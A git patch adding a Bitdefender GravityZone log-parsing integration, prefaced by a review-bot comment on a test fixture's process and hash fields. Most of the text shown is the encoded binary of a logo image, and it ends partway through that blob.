From 3460f4e2303c14bcc8d6cc608f63fa3d84f71058 Mon Sep 17 00:00:00 2001
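Review bot: On the new side `process.command_line` is still `grep -F smtpd_tls_protocols\\commandtest` (unchanged context line) while `process.executable` becomes `/usr/test/platform-python3.6` and `process.name` becomes `platform-python3.6`, so the command line and the executable now describe two different programs. If the fixture's raw event (outside the hunk) lacks the child's own file fields and the parser falls back to the initiating-process fields for executable, name and hashes, that fallback should presumably cover the command line as well, or the test should state that the mixed result is intended. `related.hash` also retains `8def3333…` and `ff000000…`, which no longer appear under any hash field in the hunk; if those are the parent process's hashes, the fixture shows them reaching `related.hash` while `process.parent.hash` stays unset, which is worth pinning one way or the other.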
From: "vladyslav.guriev"
Date: Tue, 22 Oct 2024 13:12:07 +0300
Subject: [PATCH 164/317] Feature: Bitdefender GravityZone
---
 Bitdefender/README.md | 9 ++
 Bitdefender/_meta/logo.png | Bin 0 -> 30360 bytes
 Bitdefender/_meta/manifest.yml | 5 +
 Bitdefender/gravityzone/CHANGELOG.md | 8 ++
 Bitdefender/gravityzone/_meta/fields.yml | 9 ++
 Bitdefender/gravityzone/_meta/logo.png | Bin 0 -> 30360 bytes
 Bitdefender/gravityzone/_meta/manifest.yml | 11 ++
 .../gravityzone/_meta/smart-descriptions.json | 125 ++++++++++++++++++
 Bitdefender/gravityzone/ingest/parser.yml | 111 ++++++++++++++++
 .../gravityzone/tests/antimalware_1.json | 56 ++++++++
 .../gravityzone/tests/antimalware_2.json | 59 +++++++++
 Bitdefender/gravityzone/tests/login_1.json | 35 +++++
 12 files changed, 428 insertions(+)
 create mode 100644 Bitdefender/README.md
 create mode 100644 Bitdefender/_meta/logo.png
 create mode 100644 Bitdefender/_meta/manifest.yml
 create mode 100644 Bitdefender/gravityzone/CHANGELOG.md
 create mode 100644 Bitdefender/gravityzone/_meta/fields.yml
 create mode 100644 Bitdefender/gravityzone/_meta/logo.png
 create mode 100644 Bitdefender/gravityzone/_meta/manifest.yml
 create mode 100644 Bitdefender/gravityzone/_meta/smart-descriptions.json
 create mode 100644 Bitdefender/gravityzone/ingest/parser.yml
 create mode 100644 Bitdefender/gravityzone/tests/antimalware_1.json
 create mode 100644 Bitdefender/gravityzone/tests/antimalware_2.json
 create mode 100644 Bitdefender/gravityzone/tests/login_1.json
diff --git a/Bitdefender/README.md b/Bitdefender/README.md
new file mode 100644
index 000000000..3a7c39a3e
--- /dev/null
+++ b/Bitdefender/README.md
@@ -0,0 +1,9 @@
+# Bitdefender
+
+## Description
+
+Bitdefender is a global cybersecurity company renowned for its advanced antivirus software, providing comprehensive security solutions and threat intelligence for individuals and enterprises, safeguarding against evolving cyber threats.
+
+## Intakes
+
+- [GravityZone](./gravityzone/CHANGELOG.md)
diff --git a/Bitdefender/_meta/logo.png b/Bitdefender/_meta/logo.png new file mode 100644 index 0000000000000000000000000000000000000000..dd360bce9b147401e7cd703dde3e550bf835be78 GIT binary patch literal 30360 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 
